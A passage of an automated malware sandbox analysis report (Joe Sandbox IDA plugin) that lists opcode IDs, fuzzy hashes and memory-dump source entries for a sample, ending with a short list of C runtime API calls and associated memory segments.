                                                                                                                      • Instruction Fuzzy Hash: AEC1AEFB34D222BD7152D4462F54AFB576EE6D6730730843AF807D6542F2982E4B6071

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: b6505b6000813c9714d75a3934f998369242cb834ff3c94cbabcc71a66f7a2fa
                                                                                                                      • Instruction ID: af4ab0c151f3309af1ca71a55ba97544993eb8321ec739d1a32e685ee1cd708a
                                                                                                                      • Opcode Fuzzy Hash: b6505b6000813c9714d75a3934f998369242cb834ff3c94cbabcc71a66f7a2fa
                                                                                                                      • Instruction Fuzzy Hash: D5C1BFFB34D221BDB152D4452F64AFB6B6EE6D6730730843AF807D6942F2982E4B6071

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: d96b349bb0bccbae6c5295c366f423b582a9d9b6d5507a10097f4db316f0e35f
                                                                                                                      • Instruction ID: 491b872fc0f95a7d86fb08971c7e2469cca23e8845ed1cdf3e8861f34e14238b
                                                                                                                      • Opcode Fuzzy Hash: d96b349bb0bccbae6c5295c366f423b582a9d9b6d5507a10097f4db316f0e35f
                                                                                                                      • Instruction Fuzzy Hash: B1C1BFFB34D222BDB152D4462F64AFB576EE6D6730730883AF807D6542F2982E4B6071

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: 99e380d25cfd22b54ea4aee56afe638134984de4a608b0665a333a5ca265f8f9
                                                                                                                      • Instruction ID: fda215806d49ef80c76b6f65e37b0e1029e3b0869ca69cdcb664395854888aec
                                                                                                                      • Opcode Fuzzy Hash: 99e380d25cfd22b54ea4aee56afe638134984de4a608b0665a333a5ca265f8f9
                                                                                                                      • Instruction Fuzzy Hash: CEB1CFFB34D221BDB152D4452F64AFB576EE6D6730730883AF807D6942F2982E4B6071

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: 4c6bdba1f3c68c0958650fef015de59923e11429b4bf19b8a8f50fdbb075c532
                                                                                                                      • Instruction ID: f4dbbcd9853abff38020068f600381ce42250feb88c252803495ce9811134dbf
                                                                                                                      • Opcode Fuzzy Hash: 4c6bdba1f3c68c0958650fef015de59923e11429b4bf19b8a8f50fdbb075c532
                                                                                                                      • Instruction Fuzzy Hash: 4BB1BDFB34D221BDB152D4452B64AFB676EE6D6730730883AF807D6942F3982E4B6071

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: c71e73c05f6b4e92e920a401192cb8a951bc094ee0d3c8180328b17a89009e66
                                                                                                                      • Instruction ID: 59d3fbd94ca6d09a4a506d5aa6cf7dad41f00e167eb55c8d4691e07dc866f0f8
                                                                                                                      • Opcode Fuzzy Hash: c71e73c05f6b4e92e920a401192cb8a951bc094ee0d3c8180328b17a89009e66
                                                                                                                      • Instruction Fuzzy Hash: CFB1BDFB34D221BDB152D4452B64AFB576EE6D6730730883AF807D6942F2982E4B6071

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: 385b5c410bcc387572174c60074091f0e24f7826c90b0e8b4b4a1dc5cc65a527
                                                                                                                      • Instruction ID: 99cb380093b41fb25481ccb4f3aa891eff86b25d9221966449720c8e2498d88f
                                                                                                                      • Opcode Fuzzy Hash: 385b5c410bcc387572174c60074091f0e24f7826c90b0e8b4b4a1dc5cc65a527
                                                                                                                      • Instruction Fuzzy Hash: 54B1B0FB34D221BDB252D4452B64AFB576EE6D6730730883AF807D6942F3982E4B6071

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: 4f7cc616ef5a801e5853a155460dcc01fbfbc7f6793042ef7808c96516ccb494
                                                                                                                      • Instruction ID: dc04394ed83795504afe7c2061468505b1ce4fcefdd2e6bea9c203157fd9f12e
                                                                                                                      • Opcode Fuzzy Hash: 4f7cc616ef5a801e5853a155460dcc01fbfbc7f6793042ef7808c96516ccb494
                                                                                                                      • Instruction Fuzzy Hash: 0BB1AEFB34D221BDB252D4452B64AFB576EE6D6730730883AF807D6942F3982E4B6071

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: 7930ceb83e861bca66ca07e7cfe9a0b3564025fafe110dd2f08d9fa9432c70f8
                                                                                                                      • Instruction ID: b17dda8e2c9f9d155618ebec4b905a97c472ade91b89d461e80a8f9f83550acb
                                                                                                                      • Opcode Fuzzy Hash: 7930ceb83e861bca66ca07e7cfe9a0b3564025fafe110dd2f08d9fa9432c70f8
                                                                                                                      • Instruction Fuzzy Hash: 4FB1AEFB34D221BDB252D4452B64AFB576EE6D6730730883AF807D6942F3892E4B6071

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: 277a91a8cd98cb6820c58b6f656f4dfa6ff593776075dcdc73cfd3c9b4e5c223
                                                                                                                      • Instruction ID: 342178a0582fbc8a6efed74950b84dda9678b139b20348de3bb7aa507f89aba6
                                                                                                                      • Opcode Fuzzy Hash: 277a91a8cd98cb6820c58b6f656f4dfa6ff593776075dcdc73cfd3c9b4e5c223
                                                                                                                      • Instruction Fuzzy Hash: C8A1AEFB34D221BDB152D4452B64AFB5B6EE6D6730730883AF807D6942F2982E4F6071
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: 104b1388fe134b82d232ace23d748847fe19ff039a1b8e399838a8de22f6d97d
                                                                                                                      • Instruction ID: 178dec3dcdc0d059ff05b798a304ee0c6071c40d40f7734bd99ccea20e50ffee
                                                                                                                      • Opcode Fuzzy Hash: 104b1388fe134b82d232ace23d748847fe19ff039a1b8e399838a8de22f6d97d
                                                                                                                      • Instruction Fuzzy Hash: BBA1BFFB34D221BDB152D4462B64AFB576EE6D6730730883AF807D6942F2892E4B6071
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: 91811a8504045efe4390d4a17c2b3297b3061b2804bc62d8b4cb8c6517cda97d
                                                                                                                      • Instruction ID: aadeb2f9f8f4ba15e5d50330f0f8909d1120b5a3131ff04de213d2db11fd7f87
                                                                                                                      • Opcode Fuzzy Hash: 91811a8504045efe4390d4a17c2b3297b3061b2804bc62d8b4cb8c6517cda97d
                                                                                                                      • Instruction Fuzzy Hash: E8A1AEFB34D221BDB152D4452B64AFB576EE6D6730730883AF807D6942F2892E4B7071
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: 9d4985971283376177bfb9e68be991d4167a0f2211642ef139b751766a17ce54
                                                                                                                      • Instruction ID: 79ac53e049eba9b879146dd908ccf0daea625dac1e649b57192753422f001be6
                                                                                                                      • Opcode Fuzzy Hash: 9d4985971283376177bfb9e68be991d4167a0f2211642ef139b751766a17ce54
                                                                                                                      • Instruction Fuzzy Hash: 05A1BFFB34D221BDB152D4452B54AFB576EE6D6730730883AF807D6942F3892E4B2071
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: fce7dec4ead3b51da62b7128846250b727bd6a301297b09ff535e549629ac9ad
                                                                                                                      • Instruction ID: cbbd73eb160f08c9eeda69d61ba10ee3df05d0c0b78d37b790e45354fbe08436
                                                                                                                      • Opcode Fuzzy Hash: fce7dec4ead3b51da62b7128846250b727bd6a301297b09ff535e549629ac9ad
                                                                                                                      • Instruction Fuzzy Hash: 31A1BFFB34D221BDB152D5452B54AFB5B6EE6D6730730883AF807D6942F2882E4F6071
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: 59adcdd4fdf475607957616fa1aa0f3ef83608c829fd956460c3f153b02c5441
                                                                                                                      • Instruction ID: 180fab6f92efafa94f2ebe311e20a9a74b4ee60a8c5e8dbef2a2780d8a1cadad
                                                                                                                      • Opcode Fuzzy Hash: 59adcdd4fdf475607957616fa1aa0f3ef83608c829fd956460c3f153b02c5441
                                                                                                                      • Instruction Fuzzy Hash: 6AA1AEFB34D222BD7152D4462B54AFB5B6EE6D6730730883AF807D6946F2882E4B7071
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: 9b56fec3b2752423ca2d5d5178aecb001bf04032fd038511f913cdc2b2c7d59b
                                                                                                                      • Instruction ID: 0c5029afe0fbbd60995918c020030cd4fab5b506c409e8031dab250d59df77fb
                                                                                                                      • Opcode Fuzzy Hash: 9b56fec3b2752423ca2d5d5178aecb001bf04032fd038511f913cdc2b2c7d59b
                                                                                                                      • Instruction Fuzzy Hash: C3A1AFFB34D222BD7152D4452B54AFB576EE5D6730730883AF807D6946F2882E4B7071
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: 30b2b72b7d27af2a543d99ca62a7c4a89e5407a8138fd782bef8b5270c77ec14
                                                                                                                      • Instruction ID: f5d064fe0ab06269fb3c2006a31d0ab2e416dfb80e5ff049168e4114c976326e
                                                                                                                      • Opcode Fuzzy Hash: 30b2b72b7d27af2a543d99ca62a7c4a89e5407a8138fd782bef8b5270c77ec14
                                                                                                                      • Instruction Fuzzy Hash: D191BEFB34D222BDB152D4452B54AFB176EE6D6730730883AF807D6946F2892E4B7072
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: 4f8c797eb98b8a2bae34a3c23d8267dffdad622516621b7c453ebcd081d05de7
                                                                                                                      • Instruction ID: 1630d30da141eb3b212b39cc3789b72b1602084084264ddcd380658550ca0df4
                                                                                                                      • Opcode Fuzzy Hash: 4f8c797eb98b8a2bae34a3c23d8267dffdad622516621b7c453ebcd081d05de7
                                                                                                                      • Instruction Fuzzy Hash: 1991AFFB34D221BDB152D4452B54AFB176EE6D6730730883AF807D6946F2882E4B7075
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: 1c9680faf34ec0a821c60ddcfd6908ca51d1d91f7574593beb9255ac82d5b29e
                                                                                                                      • Instruction ID: e6ef1df931691efc10813424f084ae1109f530cd7351fa83025cdf02c4a890af
                                                                                                                      • Opcode Fuzzy Hash: 1c9680faf34ec0a821c60ddcfd6908ca51d1d91f7574593beb9255ac82d5b29e
                                                                                                                      • Instruction Fuzzy Hash: 86919DFB34D222BDB152D4452B54AFB176EE5D6730730883AF807D6946F2982E4B7071
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: 2c6c1298b60e51ffdf0624f08920ee6cd3a8b442f022fe7fd44fef91acb70eb3
                                                                                                                      • Instruction ID: 42df3336e8f763afa17e77ef44660ffbeb85a4290893f476b307fc85367d7144
                                                                                                                      • Opcode Fuzzy Hash: 2c6c1298b60e51ffdf0624f08920ee6cd3a8b442f022fe7fd44fef91acb70eb3
                                                                                                                      • Instruction Fuzzy Hash: BE919DFB34D221BD7152D4452B64AFB176EE6D6730730883AF807D6942F2982E4B6076
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: 9f1681cb32acc064ada57ffe29a5a887fcb9b820e04a7fc90f164e3c0bcbffda
                                                                                                                      • Instruction ID: a82f58e6846786e7e5d05efea28780e15a3b8eab9fab0eb9222c62466cf73f54
                                                                                                                      • Opcode Fuzzy Hash: 9f1681cb32acc064ada57ffe29a5a887fcb9b820e04a7fc90f164e3c0bcbffda
                                                                                                                      • Instruction Fuzzy Hash: BD81ACFB34D222BD7152D4452B14AFB176EE6D6730730883AF807D6942F3982E4B6076
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: 22c62e8a86f1c67efa1cce6194c5d11a94f0f7316d29fa1b883da20f2b1de979
                                                                                                                      • Instruction ID: ce180ca9835352aea18d2cf8108f0557bb1648d8ed30de2123b7df3538278e5e
                                                                                                                      • Opcode Fuzzy Hash: 22c62e8a86f1c67efa1cce6194c5d11a94f0f7316d29fa1b883da20f2b1de979
                                                                                                                      • Instruction Fuzzy Hash: 9581CFFB34D222BD7152D4452B24AFB576EE6D6730730883AF807D6942F3882E4B6076
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: 4c19d8e1a2ac77648bb8e675fb648a6a180a784cd278d1f0cd4f335d6366b782
                                                                                                                      • Instruction ID: 63a7c331b41853b4083e5b8e8b52f8218732e7bec95560ea76170b25dba91073
                                                                                                                      • Opcode Fuzzy Hash: 4c19d8e1a2ac77648bb8e675fb648a6a180a784cd278d1f0cd4f335d6366b782
                                                                                                                      • Instruction Fuzzy Hash: 1281ADFB34D221BDB152D5452B10AFB276EE6D6730730883AF807D6942F3982E4B6076
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: 3b9ae896abb57d7768929309a063f73fe15d1cf00f43b97e1abb55f978084d76
                                                                                                                      • Instruction ID: 29a5110e149776baee8110dfe2ede42a14a57761dafca5e194b7eebc0e2bcd05
                                                                                                                      • Opcode Fuzzy Hash: 3b9ae896abb57d7768929309a063f73fe15d1cf00f43b97e1abb55f978084d76
                                                                                                                      • Instruction Fuzzy Hash: 6E81AEFB34D221BD7112D4456B54AFB276EE6D6730730883AF807D6942F2892E4B6076
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: 80dbca1709e1e81acb2b62917010dbb42b01b503b133669fd9308efdc0bcc34a
                                                                                                                      • Instruction ID: 4394b2eb61d64a8f15d7c54b60e7b367484e6bbdb3da13a9cd2a399ca40149be
                                                                                                                      • Opcode Fuzzy Hash: 80dbca1709e1e81acb2b62917010dbb42b01b503b133669fd9308efdc0bcc34a
                                                                                                                      • Instruction Fuzzy Hash: 0B81AEFB34D222BD7152D4452F64AFB176EE6D6730730883AF807D6942F2892E4B6076
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: 2effb1d50a0f546d97413ddbcd2c0cfe39ceb9100c8e2464b32bb07b61750e9f
                                                                                                                      • Instruction ID: b213966c1604bf182dd59f2e9ea9afe8c77b9eb0a5322d7d907fe8a416a69f8d
                                                                                                                      • Opcode Fuzzy Hash: 2effb1d50a0f546d97413ddbcd2c0cfe39ceb9100c8e2464b32bb07b61750e9f
                                                                                                                      • Instruction Fuzzy Hash: EC81CFFB34D221BDB112D4412B10AFB176EE6D6730730883AF807D6942F3982E4B6072
                                                                                                                      APIs
                                                                                                                      • _malloc.LIBCMT ref: 0040AF80
                                                                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001), ref: 0040B8C4
                                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                        • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3792366029.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.3792335417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792522579.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792522579.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792566680.0000000000436000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792587566.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792608478.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792632976.0000000000444000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792754378.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792780192.00000000005A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792843360.00000000005B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792866015.00000000005B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792898640.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792898640.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792954136.00000000005C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792977182.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792998531.00000000005C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793017539.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793041135.00000000005D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793060447.00000000005DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793083731.00000000005DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793102880.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793128931.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793147536.00000000005F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793169552.00000000005FD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793191693.0000000000606000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793216344.000000000061D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793236834.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793262916.0000000000636000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793284193.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793317418.000000000064B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793338816.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793338816.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793407994.00000000006B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
